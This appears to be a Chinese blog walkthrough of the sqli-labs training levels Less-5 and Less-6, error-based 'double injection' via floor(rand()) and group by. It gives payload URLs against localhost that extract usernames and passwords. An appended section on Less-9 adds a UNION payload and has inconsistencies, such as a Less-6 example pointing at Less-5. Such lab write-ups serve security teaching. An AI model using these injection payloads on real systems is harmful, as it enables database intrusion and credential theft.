sqli-labs less-5 & less-6

本文围绕sqli-labs中的双注入GET字符型注入展开,介绍了第五关单引号字符型注入和第六关双引号字符型注入。进入双注入关卡后,只能从错误信息查结果。文中给出了基础准备基本句式和联合查询语句,通过这些可获取想要的结果,第六关与第五关基本相同。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

GET-Double injection-Single Quotes-String (双注入GET单引号字符型注入)  Less-5

GET-Double injection-Double Quotes-String (双注入GET双引号字符型注入)  Less-6

进入第五关后基础准备基本句式:

       select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;

 

进入双注入的关卡以后,我们会发现一些区别,就是无论怎么输入都不会返回数据库的查询结果,只会输出you are in,但是有错误会返回提示信息,所以我们只能从错误信息查我们想要的结果

老规矩,我们测一下数据类型

可以看出是单引号闭合

我们直接调用双注入联合查询

http://127.0.0.1/Less-5/?id=' union select 1, count(*), concat('~',(select concat(username,'/',password) from users limit 0,1),'~', floor(rand(0)*2))as a from information_schema.tables group by a -- a

这样我们就可以得到我们想要的结果

 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

第六关和第五关基本相同

我们加入符号判断,返回信息提示为双引号闭合

http://127.0.0.1/sqli-labs/Less-5/?id="union select 1, count(*), concat('~',(select concat(username,'/',password) from users limit 0,1),'~', floor(rand(0)*2))as a from information_schema.tables group by a -- a

嵌套查询

可以得到结果

 

### SQL注入实验室 (sqli-labs) Less-9 实验指导 #### 测试环境搭建 为了确保安全测试,建议在一个受控环境中部署 sqli-labs。可以使用虚拟机或 Docker 容器来运行该应用程序。 #### 实验目标 Less-9 是基于布尔盲注的SQL注入漏洞练习。通过向服务器发送特定构造的查询字符串,验证是否存在SQL注入漏洞并尝试获取隐藏数据。 #### 注入点分析 入口位于 URL 参数 `id` 中。当访问页面时,会显示一条新闻详情。如果存在注入,则可以通过修改此参数来进行攻击[^1]。 #### 基础检测方法 首先确认是否能够利用单引号 `'` 来终止原有查询语句,并附加新的逻辑条件: - 正常请求:`http://localhost/sqli-labs/Less-9/?id=1` - 尝试闭合原查询:`http://localhost/sqli-labs/Less-9/?id=1' AND '1'='1` 若两次响应相同则说明可能存在注入风险;反之亦然。 #### 进一步探索 一旦确定了潜在的安全隐患之后,就可以继续深入挖掘更多细节。对于布尔型盲注来说,通常采用二分法或其他枚举技术逐步推断数据库结构及内容。 例如: ```sql http://localhost/sqli-labs/Less-9/?id=-1' UNION SELECT 1,2,version(),4,5 -- ``` 这条命令试图联合选择 MySQL 版本信息作为第二条记录返回给客户端展示出来。注意这里 `-1` 的作用是为了使第一条原始SELECT语句不匹配任何行从而不影响最终输出效果。 #### 防护措施探讨 针对此类漏洞的有效防御手段包括但不限于预编译语句、输入校验以及最小权限原则的应用程序设计模式等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值